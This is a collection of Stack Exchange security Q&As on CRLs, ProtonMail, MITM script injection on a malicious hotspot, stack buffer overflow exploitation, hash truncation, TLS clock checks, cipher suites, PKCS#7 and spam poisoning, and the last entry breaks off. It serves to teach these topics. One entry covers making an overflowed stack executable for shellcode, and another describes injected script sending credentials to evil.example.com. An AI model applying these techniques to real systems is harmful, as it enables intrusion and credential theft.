72,570 | I noticed that at least one major CA (Comodo) publishes their CRL over HTTP rather than HTTPS. This seems to me to be somewhat of a vulnerability, as an attacker could hijack the HTTP connection that seeks to download the CRL and when HSTS is in use at the very least execute what effectively amounts to a DoS attack on the domain. (Because with HSTS active, browsers should not allow the user to bypass the invalid certificate warning; see RFC 6797 section 8.4 and section 12.1 .) While CRLs are normally signed , and it would seem that any sane implementation should reject a signed CRL that does not pass signature validation, I haven't seen any way to determine the signer of the CRL in any web browser, so even signing a replacement CRL with your own root certificate key appears to be a relatively low-risk operation. And this of course assumes that the browser requires that the CRL is signed in the first place; if not, you can just replace it with a non-signed CRL. (And of course, if the implementation does reject a signed CRL that fails signature validation, or even non-signed CRLs, it becomes trivial to trick the UA into using a certificate that has been revoked but which has not yet reached its expiration date.) Is this an actual potential problem? What checks are normally performed by UAs with regards to CRLs to prevent it from becoming an actual problem? | There is no such thing as a non-signed CRL; the signature field is mandatory, and any system that uses the CRL will verify the signature. In pure X.509 , a CRL will be deemed "acceptable" as a source of information about the revocation status of a given certificate E if it is signed by an "allowed revocation issuer": the CRL's signature must match the public key contained in an already validated certificate, whose subjectDN is equal to the issuerDN of E (you can have a distinct DN if E contains the relevant CRL distribution point extension and the CRL has a matching Issuer distribution point extension; but let's forget this additional complexity). Complete rules are exposed in section 6.3 . Note that "pure X.509" is supposed to work in the context of the Directory, the kind-of worldwide LDAP server that references everything under unambiguous Distinguished Names. Since the Directory does not really work, because it does not, as it were, exist at all, existing implementations tend to implement stricter and simpler rules. Generally speaking, a Web browser validating a certificate E issue by CA C will accept a CRL only if it is also signed by the same CA, with the same key. This rule keeps path validation simple and bounded (otherwise, you may imagine a situation where you must get a CRL for each certificate in the path, and each CRL is to be verified against another CRL issuer certificate that requires its own path validation, and so on). Therefore, producing your own CRL relatively to your own root CA is unlikely to have any actual effect. CRL, like certificates, are thus objects which are always signed, and never used without verifying that signature(*), so they can be served over plain HTTP. Using HTTPS to serve CRL is just wasted resources; it may even prevent CRL download from working since some implementations (e.g. Windows) refuse to follow HTTPS URL when validating certificates (be it for CRL, OCSP, or extra intermediate CA download), because that would mean SSL, then another certificate to validate, and possibly an endless loop. 
(*) I here exclude root CA "certificates", traditionally self-signed; these are not real certificates in the X.509 sense, but only objects that mimic the encoding rules of certificates. | {
"source": [
"https://security.stackexchange.com/questions/72570",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2138/"
]
} |
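To illustrate the rule described in the answer above -- a CRL is only usable after its signature verifies under the CA key that was already validated for the chain -- here is a hedged sketch with Python's cryptography package. The file names are placeholders, and a real client also checks issuer names, thisUpdate/nextUpdate and distribution points.

from cryptography import x509

# Placeholder inputs: the already-validated issuing CA certificate, a CRL
# fetched over plain HTTP, and the end-entity certificate to be checked.
ca_cert = x509.load_pem_x509_certificate(open("issuing_ca.pem", "rb").read())
crl = x509.load_der_x509_crl(open("downloaded.crl", "rb").read())
ee_cert = x509.load_pem_x509_certificate(open("server.pem", "rb").read())

# 1. The CRL must be signed by the CA key we already trust for this chain;
#    a CRL forged under an attacker's own root fails here, which is why
#    serving the CRL over plain HTTP does not let an attacker substitute one.
if not crl.is_signature_valid(ca_cert.public_key()):
    raise ValueError("CRL signature does not verify against the issuing CA")

# 2. Only then is the revocation list consulted.
revoked = crl.get_revoked_certificate_by_serial_number(ee_cert.serial_number)
print("revoked" if revoked is not None else "not listed in this CRL")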
72,610 | Is it possible to create a Web service that encrypts all messages, such that only the writer, and the person to whom the mail is sent, can read it? In other words, is the theory behind ProtonMail valid? | Strictly speaking it is not possible, for the following reason: if the Web service encrypts the message, then the Web service gets to see the unencrypted message at some point (note: I write service , not server ). At best, the service may be honest and do its best not to have a look at the messages at they flow. Now let's see the claims of that "ProtonMail" service : Swiss Based. Well, I see no reason to find this implausible. Switzerland is a real country and there are people who live there. However, they suggest that by being a "Swiss service", the data immediately come under the cover of Swiss law, which is a rather bold statement. Electrons don't have a nationality, and, contrary to a piece of paper, an electronic message does not have a well defined geographic position at all times. Zero Access to User Data. That one is not completely true. When you write your message, you do it in their Web site. Even if all encryption technically occurs in your browser, that would still be done using the Javascript code that they send to you every time you connect to their service. If they want to read your messages without you noticing it, they can. End-to-End Encryption. This is possible, if encryption is Javascript-based on the sender's browser, and decryption is again Javascript-based on the recipient's browser. Taking into account the pitfalls of doing crypto in Javascript . Anonymous. I don't believe that one, at least not in the long term. They claim not to log anything; however, experience of past anonymous remailers shows that the logs are the only thing that stands between the remailer operators and jail, in some extreme cases (e.g. if the service is used to coordinate some terrorist actions). Almost invariably, the claim of not logging turns out to be fake after a while. On a similar note, even if the site operators are idealist enough not to log anything, eavesdropping on the network provider side is enough to get a lot of metadata and, e.g., work out who talks to who. This is called traffic analysis . It works well and no Web service can protect against that (only network-wide systems like Tor stand a theoretical chance to defeat traffic analysis). Securely communicate with other email providers. That one makes me cringe a bit. They mean that when the recipient is not a ProtonMail registered user, they send a normal email with an embedded link to their site, so that the user may download the encrypted email and the piece of Javascript that decrypts it. As they say it, this requires that you previously shared a password with the recipient by some unspecified mean. The bad part here is that it trains people to click on links received by email, and then enter their passwords on the resulting Web page. Self Destructing Messages. This one works just as well as, or as bad as, copy protections on movies. The raw fact is that if the recipient could read the message at some point, then he can get a copy indefinitely (if only by taking a photo of the screen with his smartphone). The "self destruction" is more a declaration of intent (pleeease don't save this email) than a security measure that can be really enforced. 
(However, automatic destruction of messages after a time will sure help the ProtonMail administrators, since they store the encrypted emails on their systems and don't want to do that indefinitely, because disk space, though cheap, is not free.) Open Source Cryptography. That one is believable, and good news. At least they don't reinvent their crypto, but use time-honoured standards (in this case, OpenPGP ). (I don't recognize any name in their list of security experts , but I don't know everybody. Effort at transparency is good.) Hardware Level Security. They don't mean a HSM ; they mean that they lock the doors of their server rooms, and use disk encryption. That last bit is weird: weren't the emails supposed to be already encrypted ? What private data remains, that they feel that it should be encrypted again ? This looks like security theatre to me. SSL Secured Connections. This is very plausible, and very much needed in order to avoid third-parties tampering with their Javascript. Not using SSL would be a killing flaw in their system. Unfortunately, they spoil the effect by adding: "To allow extremely security conscious users to further verify that they are in fact connecting to our server, we will also release the SHA3 hash for our SSL public key". Publishing the hash of your public key makes sense only if people can obtain the hash in an untamperable way; if that hash is simply pushed on your own SSL Web site then you are running in circles. Invoking the magic of "SHA3" reveals the extent of the seriousness of that claim: this really is just some more security theatre (not the least since SHA-3 does not exist yet: right now, FIPS 202 is still a draft ). (In fact they published the SHA-1 hash , not SHA-3.) Easy to Use. For that one, you will have to judge for yourself. "Ease of use" depends on who uses it. Summary: ProtonMail appears to be roughly the equivalent of using PGP, except that it is Web based, thus centralized. It brings back a lot of issues that PGP was supposed to solve, namely that there is a central server that gets to see who talks to who, and that serves the actual code repeatedly. That central server is thus a juicy target for whoever is intent on spying on people. The decentralized nature of PGP is its biggest asset against attackers; by making it Web-based, they increase the ease of use but abandon that decentralization. While ProtonMail is certainly better than plain, unencrypted email, it would be wrong to believe it to be the ultimate answer to email security. At least, they made some efforts: They use existing standards. They have an explicit threat model . Even if it is not very detailed, at least they know the expression "threat model", which puts them in the top 5% of vendors of security systems. They try to be transparent . On a less bright note, I did not see anything related to opensourceness. That is, they say that they use "open source libraries" for cryptography, but they don't actually say which libraries these are; and they don't show their own source code, either. Users are back to having a look at the Javascript code and do their own reverse-engineering, and that does not look very opensource to me. They also don't actually given any details on their protocol . Since they don't know (or so they say) the "mailbox password" of the recipient, then this begs the question of how they can push an email into that mailbox. 
We can infer that the mailbox includes a public/private key pair, and the mailbox password is really used to encrypt the private key, not the mailbox itself; this is what would make sense with the information they give (in particular reliance on OpenPGP). But it would be better if they said it. If the protocol is fine then it should be published; there is no reason not to do so. No source and no protocol are very bad points and they really should fix that. Summary of the summary: ProtonMail's security can be summed up as: their system is secure because they say that they are good guys, honest and all, and they claim to be competent. So that's all fine, eh ? | {
"source": [
"https://security.stackexchange.com/questions/72610",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60477/"
]
} |
72,652 | Suppose I am connected to a wifi-hotspot hosted by a malicious attacker. Further, suppose that I am accessing a login page of an fictitious email site tmail.com over insecure HTTP connection. My question is how can the attacker who owns the WiFi-hotspot steal my password by injecting the malicious JavaScript code without leaving any trace? Will URL still remain the tmail.com when I am accessing this or will it change? Where (application layer/network layer) and how (download the web page or modify network layer data) exactly the attacker will make the changes to succeed? I am asking this question purely for educational purpose. I am just curious and have no intent to harm anyone. | The ISP (here, the WiFi hotspot) is what delivers pages to you. It's of course trivial for an ISP to read unsecured traffic: Let's now consider a case where the credential submission is secured with HTTPS (so the ISP cannot sniff them right off the wire), but the HTTPS log-in page loads an unsecured script, helper.js . The ISP can inject any behavior into that non-HTTPS script before it finally serves the script to the browser. For example, the ISP can inject the instructions, " When this page submits credentials, send a copy of them to evil.example.com . " The diagram below shows secured requests and responses in green and insecure requests/responses in other colors: When your browser requests helper.js over HTTP, the malicious ISP responds with a resource that has the wrong content. Your browser has no idea what helper.js should look like, and without any integrity validation measure (like HTTPS), the browser has no idea anything is wrong. Your browser assumes it has correctly been served http://tmail.com/helper.js , because that's what it asked for and the ISP sent back a response without any complaint (e.g., the response was an HTTP 200 for /helper.js ). The fact that what your browser got is different from what the real server sent is totally irrelevant, because your browser has no way to detect that this difference occurred. Based on your comments, you seem to think that modifying a resource can only be done by redirecting the browser to another resource. This is incorrect. Consider Bob the browser, Iggy the ISP, and two servers, Alice and Mallory . First, consider the honest case: Bob wants to know Alice's favorite food. Bob says to Iggy, "Hey, Iggy, please send a GET /favoritefood to alice.com ." Iggy asks Alice about her favorite food. Alice tells him, "Pizza, but with no onions, because I hate onions." Iggy comes back to Bob and says "Hey, I have that response for your GET /favoritefood from alice.com ! She says she loves pizza, but not onions." Now let's consider a dishonest case: Bob wants to know Alice's favorite food. Bob says to Iggy, "Hey, Iggy, please send a GET /favoritefood to alice.com ." Iggy comes back to Bob and says, " 301 Moved Permanently -- ask Mallory about Alice's favorite food instead" Bob then sends Iggy to GET /favoritefood from mallory.com instead. It's a different resource, and Bob knows it's a different resource from the one he originally asked for. In this case, the browser's address bar would be different from what you originally typed in: mallory.com/favoritefood instead of alice.com/favoritefood . Now consider this case instead: Bob wants to know Alice's favorite food. Bob says to Iggy, "Hey, Iggy, please send a GET /favoritefood to alice.com ." Iggy asks Alice about her favorite food. Alice tells him, "Pizza, but with no onions, because I hate onions." 
Iggy comes back to Bob and says "Hey, I have that response for your GET /favoritefood from alice.com ! She says she loves to eat lots and lots of onions." There's no other resources involved. http://alice.com/favoritefood is the only resource being fetched here; Iggy simply lied about what the contents of the resource were. There is no way for Bob to detect that Iggy is lying, because there is no integrity-validating system in place. One final attempt at explanation: suppose the ISP is honest but mistakenly flipped a single bit when delivering the contents of the HTML file. Surely you would not expect such a mistake to cause the web page to load under a different domain. Now suppose that the honest ISP mistakenly flipped two bits instead of just one: again, such a mistake would never cause the domain or resource path to change. Now suppose the ISP flipped two thousand bits by honest mistake (perhaps the ISP has a faulty switch some place, or the WiFi router was hit by cosmic rays): again, no need for the domain to change. Now suppose the change was done maliciously instead of by mistake: again, the change in intent causes no change in what is actually happening. The resource path and origin, as identified in the browser's address bar, remains unchanged, while the ISP is free to change the contents of the resource (honestly or dishonestly) without detection. | {
"source": [
"https://security.stackexchange.com/questions/72652",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55595/"
]
} |
72,653 | I am trying to exploit a simple stack overflow vulnerability. I have a basic program in C: #include <cstring>
int main( int argc, char** argv )
{
    char buffer[500];
    strcpy(buffer, argv[1]);
    return 0;
} compiled using -fno-stack-protector . I've already figured out the buffer length and I've successfully overwritten the EBP and EIP registers. I injected a large number of NOPs, followed with this shell code and finally inserted an address where the injected NOPs are so the code is executed. Now the problem. On the picture attached you can see the gdb output. If I run my program with malicious input it gets a SIGSEGV. Dumping the address 0xbffff880 you can see there is a lot of NOPs followed with the shell code (pink box) and finally with the address (blue box). I've thought this would work as follows: At first the 0x90909090 s and the shellcode are considered as simple data. After these (past the pink box) there is an address 0xbffff880 . I am saying to the cpu "hey there, now please execute what's on 0xbffff880 ". The cpu takes what's on the address and executes all the NOPs and the shellcode itself. However that's not happening and SIGSEGV occures. Where am I mistaken? I am trying to achieve this on Virtualbox instance of 32-bit Ubuntu 14.04 Linux 3.13.0-39-generic i686 with ASLR turned off. | Your memory address 0xbffff880 is most likely non-executable, but only read/write. There are a couple of ways you can overcome this. If that is a stack address you can use -z execstack while compiling. This will essentially make the entire stack memory executable. For a more robust solution you can write the shellcode to call mprotect on the address you are writing to. For example, the following line will mark address 0xbffff880 as read/write/executable. mprotect((void*) 0xbffff880, buffer_len, PROT_READ | PROT_WRITE | PROT_EXEC); -fno-stack-protector does not mean that the stack will be executable. It only disables other security features such as canaries or stack cookies . If these values are overwritten (with a buffer overflow) when they are checked the program will fail. This would not enable the execution of your buffer. | {
"source": [
"https://security.stackexchange.com/questions/72653",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34749/"
]
} |
72,673 | I'm wondering how bad it is to truncate a SHA1 and only compare, say, the first 10/12 bytes, etc.
I'm working with a fixed length of 8 bytes that I need to hash for uniqueness but store with the smallest footprint possible (8 other bytes would be nice, but I guess not feasible). A bit more information without sacrificing professional secrets: Some blackbox take a 8 byte value, transforms it and transmits it to a server, where it is checked for validity against a table of know items. Neither the blackbox nor the server should be able to know the original 8 bytes. Best solution would be some kind of 1 to 1, one way relation, like asymmetrical encryption. But I don't think any encryption mechanism outputs so little bytes. | There is no absolute answer, because it depends on the attack model . By truncating the hash, you make some operations easier; this is bad if the attacker wants to perform these operations, and making them easier actually makes them feasible . There are three main characteristics that cryptographic hash functions try to fulfil: Resistance to preimages: given x , it should be infeasible to find m such that h(m) = x . Resistance to second preimages: given m , it should be infeasible to find m' ≠ m such that h(m) = h(m') . Resistance to collisions: it should be infeasible to find m' ≠ m such that h(m) = h(m') . For a perfect hash function that has an output of n bits, costs of finding preimages, second preimages or collisions will be, respectively, 2 n , 2 n and 2 n /2 . By truncating the hash output, you lower these costs correspondingly. As a rule of thumb, a cost of 2 64 is very hard (feasible, but it takes more than a dozen PC) and 2 80 is infeasible. In your case, if a collision is interesting for the attacker, and he gets to choose what is hashed, then the attacker will try to input two data elements that imply a hash collision (on your truncated hash). Truncating to 12 bytes makes the attack quite feasible, easy if you go down to 8 bytes. On the other hand, if all the attacker can do is to try to find some data element matching a given truncated hash (second preimage), then at 10 or 12 bytes this is still too hard to be feasible, and at 8 bytes it is merely "very expensive" (so probably not worth the effort). If there is no attacker and you are just fighting bad luck, then truncating to 8 bytes incurs the risk of spurious collisions; you should reach your first collision after (on average) entering a few billions of entries. Depending on your situation, this may or may not be tolerable. | {
"source": [
"https://security.stackexchange.com/questions/72673",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60543/"
]
} |
72,679 | I can't quite figure out the differences between using the Tor browser and using a VPN (like concretely proXPN). From what I understand the idea is the same, that they both hide the IP address. The only difference that I can see is that Tor seems slower because it has to pass through several computers. So is using the Tor browser better in terms of hiding your identity and online traffic? Is there a difference between who can see your traffic? (I am guessing that there is a difference.) (I see this question Which is more secure - a VPN, a proxy-server, Tor, etc.? And why so, exactly? was closed as being too broad, but I hope my question is a bit more concrete.) | TL;DR Tor provides anonymous web browsing but does not provide security. VPN Services provides security (sort of) and anonymity, but the anonymity might be more in question depending on the service. Since you're depending on them not logging pieces of information that may or may not be able to be traced back to you. VPNs Traditional A traditional Virtual Private Network does not extend your ISP. A VPN extends an existing private network across a public network. For example, let's say my company has a private network with email servers, web servers (intranet), and DNS setup for company related services. It's a private network for company employees only. However, some employees want to work from home. A VPN is set up so that employees can securely connect to the private network remotely. This provides two features: Authentication - Users present their credentials to gain access to the VPN Encryption - The entire tunnel between the remote user and the private network's gateway is encrypted. Take that last statement: "The entire tunnel between the remote user and the private network's gateway is encrypted." Once you're through the gateway, communication is un-encrypted. Unless the services within the private network itself use another means of secure communication. Keep in mind that no anonymity is provided by this setup. In fact, the company knows exactly what IPs are connecting to its private network. VPN Services Nowadays VPN seemingly takes on many meanings, and online/cloud/[insert Internet buzzword here] have complicated things. We see questions now, "Which VPN takes your anonymity seriously?" What has happened is that VPN Services have become a kind of "secure anonymity service". A service will provide secure communications to a proxy server that will then dump your communication out into the clear to whatever your destination. This is kind of like what a traditional VPN does, except now the statement of "a VPN extends your ISP" is kinda true. Now you're just encrypting the first half of your communications. It extends in the sense that you can access websites and services you might not normally be able to due to your geographic location. But "extends" really isn't the right word to use. Take ExpressVPN for example, it advertises the following: Encrypt your Internet traffic and hide your IP address from hackers and spies. Access any website or app without geographic restrictions or censorship. Take out "Encrypt your Internet traffic" from the first statement, and you basically have an anonymous proxy. But now that the tunnel is encrypted it's a VPN to your anonymous proxy (gateway) that then forwards your traffic on, into the public Internet. Tor Browser Onion Routing Onion routing was designed to provide complete anonymity to a connection. It accomplishes this with encryption. Three layers of encryption. 
When using the Tor Network a path is determined with a minimum of 3 nodes (can be more). Encryption keys are setup and exchanged between you and all three nodes. However, only you have all of the encryption keys. You encrypt your data with each of the nodes' keys starting with the last node's (exit node) and ending with the first (entry node). As your data moves through the network a layer of encryption is peeled off and forwarded to the next node. As you can see the exit node decrypts the last layer, and forwards your data to its destination. Which means your data is in "plaintext" 1 at this time, but complete anonymity is accomplished. With at least 3 nodes no node knows both the source and destination. Anonymity not Security Tor does not promise secure communications. Encryption is only used to provide anonymity between nodes , your data is not encrypted otherwise. This is why it is still highly encouraged to use HTTPS-enabled websites while using Tor. As @LieRyan mentioned in another thread's comment, sending personally identifiable information through Tor without using other security measures will break any anonymity that Tor provides. Traffic Visibility As far as traffic visibility if there is an admin on the network they will be able to see your traffic. Let's take a situation with a VPN: you have your remote laptop R and your private network gateway/secure anonymous proxy (G). Now you have a private network IP that is encrypted from R to G. A network admin sitting on G can see your plaintext 1 . As stated above if you are using another secure protocol like SSL/TLS through the VPN/VPN Service then the "plaintext" is really encrypted, and the network admin would not see anything but encrypted data. So this really depends on where the network admin is sitting in the connection, and whether or not you use a secondary secure protocol underneath the VPN. This same logic applies to Tor. Because as I stated earlier encryption is only used for purposes of maintaining anonymity. Both traditional VPNs and VPN services are to protect against external visibility into the network. Neither of them will protect you from authorized administrators for the network you're on . It's all about protecting your data from unauthorized eyes. Even with SSL/TLS, a website that you're visiting sees your decrypted traffic. It has to in order to process the request. Admins on that website can see those same requests and/or log them. It's the security protocols used initially and in between that make the biggest difference in the security of communication. 1 It's plaintext as far as the data that was sent is seen here. If the data is encrypted with something like SSL/TLS before going through the onion routing then the encrypted data would be seen at this point. | {
"source": [
"https://security.stackexchange.com/questions/72679",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10435/"
]
} |
72,866 | We've recently implemented WS Trust security over SSL for our client / server communications. Our application is used by thousands of our customers, spread out all over the world. One of the problems we've had in the past with secure communications is that customers with unsynchronized clocks have difficulty connecting, resulting in customer calls and frustration. Unfortunately, the reaction that has caused in the past is to simply disable this check or simply increase the acceptable clock skew to near infinite amounts. I do not want the security of our system to be compromised, nor do I want to trigger an influx of complaints of customers who do not have their clocks closely in sync with the time on our servers (which are synced to internet time). In order for me to prevent the synchronization check from effectively being disabled, I must first be able to explain to my managers why this is a bad idea, and why the benefits of clock synchronization outweigh the cost of customer complaints or confusion. What role does clock synchronization play in SSL communications and what sorts of vulnerabilities does disabling it introduce? What is typically considered to be the maximum acceptable range for clock synchronization in secure customer facing applications? | In SSL, clocks are used for certificate validation . The client needs to make sure that it talks to the right server; for that, the client will validate the server's certificate. Validation implies verifying a lot of things; two of them involve clocks: The server's certificate (and all involved CA certificates) must include the present time in their validity time range. Each certificate as a notBefore and a notAfter fields; the current time must fall between these two dates. The client is supposed to obtain the revocation status of each certificate, by obtaining (and validating) a CRL (Certificate Revocation List) from the appropriate issuers (the CA). A CRL is deemed acceptable if (in particular) it is "not too old": again, the CRL has a thisUpdate field that says when it was produced, and a nextUpdate field that more-or-less serves as expiration date for the CRL. If the client's clock is off, then it will break either or both of these functionalities. For instance, the server's certificate will be considered as "long expired", or "not usable yet", leading to rejection. Accepting that the client's clock is off means that the client is modified to disregard dates in certificates and CRL. The ultimate consequence for security is that if an attacker succeeds in stealing the private key of a server, then that attacker will be able to impersonate that server forever. The point of revocation is to have a verified method to recover from such a compromise; and the point of certificate expiration is to keep CRL from growing indefinitely. If clients disregard revocation and/or expiration, then the raw consequence is that once a compromise happens, then you are doomed forever . Which is usually considered to be a bad thing. On a brighter note, this is a problem for clients, not for the server. If you operate the server, then it is the client's job , not yours, to validate your certificate properly. If the client really insists on doing things insecurely and being vulnerable, then you cannot really prevent it, at least not technically (you can do things contractually : if the client's incompetence allows for a breach, the client should pay for it). 
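To make that client-side check concrete, here is a minimal Python sketch of the date comparison a validating client performs (the hostname is a placeholder; note that wrap_socket already enforces the validity window during the handshake, so the explicit comparison below only shows where the local clock enters):

import socket, ssl, time

ctx = ssl.create_default_context()
with socket.create_connection(("example.com", 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
        cert = tls.getpeercert()          # dict view of the validated server certificate

not_before = ssl.cert_time_to_seconds(cert["notBefore"])
not_after = ssl.cert_time_to_seconds(cert["notAfter"])
now = time.time()                         # read from the local clock; this is the weak point
print("within validity window:", not_before <= now <= not_after)

If the local clock is off by more than the certificate's validity margin, the handshake itself fails before the comparison is ever reached.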
On a similar note, if the clients can talk to your server, then they are connected to some sort of network, meaning that Internet-based time synchronization is a possibility. Requiring an accurate clock is challenging for some embedded devices, but it should not be for networked computers (including smartphones). | {
"source": [
"https://security.stackexchange.com/questions/72866",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60743/"
]
} |
72,926 | Is TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 a safe cipher suite to use for a TLS 1.2 connection to a Tomcat server? What are potential weaknesses or better alternatives? I am looking for a cipher supported by Java 8. | TLS ciphersuite names are structured in such a way that you can tell what algorithms and key sizes are used for each part of the handshake and encrypted session. Let's break this one down and see if there are any improvements we can make: TLS - This doesn't signify anything in itself, but does allow me to mention that TLS 1.2 is the latest version of TLS and does not have any known vulnerabilities. ECDHE - Elliptic Curve Diffie-Hellman with Ephemeral keys. This is the key exchange method. Diffie-Hellman key exchanges which use ephemeral (generated per session) keys provide forward secrecy, meaning that the session cannot be decrypted after the fact, even if the server's private key is known. Elliptic curve cryptography provides equivalent strength to traditional public-key cryptography while requiring smaller key sizes, which can improve performance. Additionally, they serve as a hedge bet against a break in RSA. RSA - The server's certificate must contain a RSA public key, and the corresponding private key must be used to sign the ECDHE parameters. This is what provides server authentication. The alternative would be ECDSA, another elliptic-curve algorithm, but you may be restricted by the types of certificates your CA will sign. AES_128 - The symmetric encryption cipher is AES with 128-bit keys. This is reasonably fast and not broken (unless you think NSA has backdoored AES, a topic for another time). Other than AES_256 (which may be too costly performance-wise), it's the best choice of the symmetric ciphers defined in RFC 5246 , the others being RC4 (which has some known weaknesses and may be broken relatively soon) and 3DES_EDE (which only has a practical bit strength of 108 to 112, depending on your source). CBC - Cipher Block Chaining mode. Here's where you can probably improve your choice. CBC mode is a way of employing a block cipher to encrypt a variable-length piece of data, and it has been the source of TLS woes in the past: BEAST, Lucky-Thirteen, and POODLE were all attacks on CBC-mode TLS. A better choice for performance and security is AES_128_GCM, which is one of the new AEAD ciphers introduced in TLS 1.2 and has good performance and security characteristics. SHA256 - This is the hash function that underlies the Message Authentication Code (MAC) feature of the TLS ciphersuite. This is what guarantees that each message has not been tampered with in transit. SHA256 is a great choice, and is the default hash algorithm for various parts of TLS 1.2. I'm pretty sure that using SHA-1 would be OK here, since the window for exploitation is so much smaller than, e.g. the certificate signature. AEAD ciphersuites are authenticated to begin with, so this additional MAC step is not needed or implemented. Essentially, you have chosen a good ciphersuite that doesn't have any practical problems for now, but you may wish to switch to an AEAD ciphersuite (AES-GCM or Bernstein's ChaCha20-Poly1305) for improved performance and protection against future CBC-related vulnerabilities. | {
"source": [
"https://security.stackexchange.com/questions/72926",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60799/"
]
} |
73,156 | Am I correct calling file with .p7b file extension saved as 'Cryptographic Message Syntax Standard - PKCS#7 Certificates (.P7B)' in Windows - a 'PKCS#7 certificate'? Or is it better called 'X.509 certificate saved in PKCS#7 format'? When would one choose one certificate format over another? Do these formats have any particular strengths or weaknesses? Adding this question after my first two edits. How is PKCS#7 format different compared to DER/PEM file formats? Thanks Edit #1: Firefox under Linux offers me an ability to export some website's certificate as: X.509 Certificate (PEM) X.509 Certificate (DER) X.509 Certificate (PKCS#7) Does it mean that PKCS#7 here is just a binary file format similar to but distinct from DER? If true then .p7b file is just an X.509 certificate saved in PKCS#7 format (as opposed to PEM or DER formats). Edit #2: Follow up to my first edit. This page OpenSSL: Documents, pkcs7 suggests that PKCS#7 can be encrypted in either DER or PEM. From that I deduce that PKCS#7 is not a distinct binary file format. Now I'm totally confused. Edit #3: Ok, I figured the relationship between PEM and DER formats. The Base64 encoded payload of the PEM file is actually data in DER format. So initially the X.509 certificate is encoded in DER format and then optionally you can encode the resulted 'DER encoded certificate' to 'PEM encoded certificate'. I'm still having difficulties fitting PKCS#7 part of the puzzle. Edit #4: Another piece of information. PKCS#7 seems to be a container that allows to bundle together several X.509 certificates prior to encode them into DER format (which is different from PEM format where you can bundle certificates together in the same file by just pasting them one after another). | You've evolved to mostly right, but to add several points
and expand on @CoverosGene's answer more than I felt comfortable doing in an edit:
a (very!) general data structuring method which has several defined encodings, of which DER Distinguished Encoding Rules is quite common and is used here.
is much as you say just binary (DER) data encoded in base64 (edit) broken into lines normally every 64 chars (but there are variations), plus header and trailer lines
consisting of dashes + BEGIN or END + the type of data, in this case CERTIFICATE + dashes.
Those lines look redundant to a human but they are expected and mostly required by software.
PEM (Privacy Enhanced Mail) was actually a complete standard for secure email that has now
been mostly forgotten (see below) except for its encoding format. (edit) As of 2015 there is RFC 7468 describing in detail most use of 'PEM' formats for modern crypto data. PKCS#7 was defined by RSA (the company, not the algorithm) as a multi-purpose format
for encrypted and/or signed data. It was turned over to IETF and evolved into CMS Cryptographic Message Syntax in RFC 2630 , then RFC 3369 , then RFC 3852 , then RFC 5652 ,
hence the wording of the Windows (inetopt) prompt. "PKCS#7" is often used to mean both the original RSA PKCS#7 and the IETF successor CMS, in the same way "SSL" is often used for
both the original Netscape protocol and the IETF successor TLS Transport Layer Security. The .p7b or .p7c format is a special case of PKCS#7/CMS: a SignedData structure containing
no "content" and zero SignerInfos, but one or more certificates (usually) and/or CRLs (rarely).
Way back when this provided a standard way to handle (edit) the set of certificates needed to make up a chain (not necessarily in order). PKCS#7/CMS is (are?) also ASN.1 and depending on circumstances can be either DER or BER ,
a closely-related encoding with some very minor differences that most DER decoders handle. While PKCS#7/CMS like any DER or BER object can be PEM-formatted, I've not seen any implementation other than
openssl. (edit) It is rare for certs. (Java CertificateFactory can read PKCS7/CMS-certs-only from DER or PEM, but CertPath.getEncoded writes it only to DER.) In contrast both DER and PEM formats for a single cert are common. PKCS#7/CMS is also used as the basis for S/MIME secure email (multiple rfcs starting from 5751).
Basically PEM encoded PKCS#7 into ASCII text which email systems of the 1980s could easily handle, while
S/MIME represents CMS as MIME entities which are encoded in several ways modern email systems can handle. OpenSSL confused matters by implementing, in order: a pkcs7 command which handles
the certs-CRLs-only case not full PKCS#7; a crl2pkcs7 command which actually handles
CRLs and certs, but again not the rest of PKCS#7; a smime command which actually handles both S/MIME
and PKCS#7/CMS for most cases of encrypted and/or signed messages; and a cms command which actually handles
both S/MIME and PKCS#7/CMS for a more complete set of cases. So I would describe the options as: a cert in PEM or DER format; a (single) cert
in a PKCS#7 container or for short just p7, and mention PEM only in the rare case it applies;
or a cert chain in PKCS#7 or p7. The semantic difference between a single cert and a cert chain
is at least as important as the format difference between a cert by itself or in a container. And this doesn't even reach the widespread confusion between a certificate by itself (for some other entity, most often a CA root or anchor) and the combination of privatekey PLUS certificate -- or usually chain -- that you use to prove your own identity, for example as an SSL/TLS server or when signing S/MIME email. That uses the originally-Microsoft PFX Personal Information Exchange format, or its standardized form PKCS#12 or "p12". | {
"source": [
"https://security.stackexchange.com/questions/73156",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37967/"
]
} |
73,181 | This answer mentions Bayesian poisoning in passing and I've read the wikipedia page but don't feel I've fully grasped it. The first case, where a spammer sends a spam with a payload (link, malicious file, etc) and includes lots of non-spammy "safe" words seems obvious enough. The aim is to bring up the rating of that individual email so that spam filters might class it as "not spam". The second case is more subtle and (to me) confusing: Spammers also hope to cause the spam filter to have a higher false positive rate by turning previously innocent words into spammy words in the Bayesian database (statistical type I errors) because a user who trains their spam filter on a poisoned message will be indicating to the filter that the words added by the spammer are a good indication of spam. How does this help the spammer? Sure, false-positives (if I've understood correctly that this means legitimate emails wrongly classed as spam) are annoying, but they would have the be very common to disable spam filters entirely. It doesn't seem like this would change the rating of real spammy words, or does it just affect their relative rating? Finally, does this, or any other, approach help an individual spammer with a particular few spam words they'd like to sneak through the filters, or would it potentially help all spammers? Could someone provide or link to an example-based explanation? | There's a good paper published named Bachelor thesis:The Effects of Different Bayesian Poison Methods on the Quality of the Bayesian Spam Filter ‘SpamBayes’ by Martijn Sprengers. I'll try to make TL;DR: Bayesian spamfilters try to decide if an email is spam or not by looking at keywords in an email. What it does is review the words present in normal and spam email and update the scores for each word. These scores are used to deduce if an email is spam or not by making a score based on the overal score of words present in the email. Words are re-scored, meaning that if "Viagra" appears in several normal emails, it will get a lower score over time. This is abused by spammers by generating email with several low scoring words, commonly found in legitimate emails and adding a single bad word. Because the score of the email will overall be considered good "Viagra" will get a lower score over time making it a legitimate word, and causing spam email to pass through spam filters. There are three attacks the paper discusses: Random Words: This attack 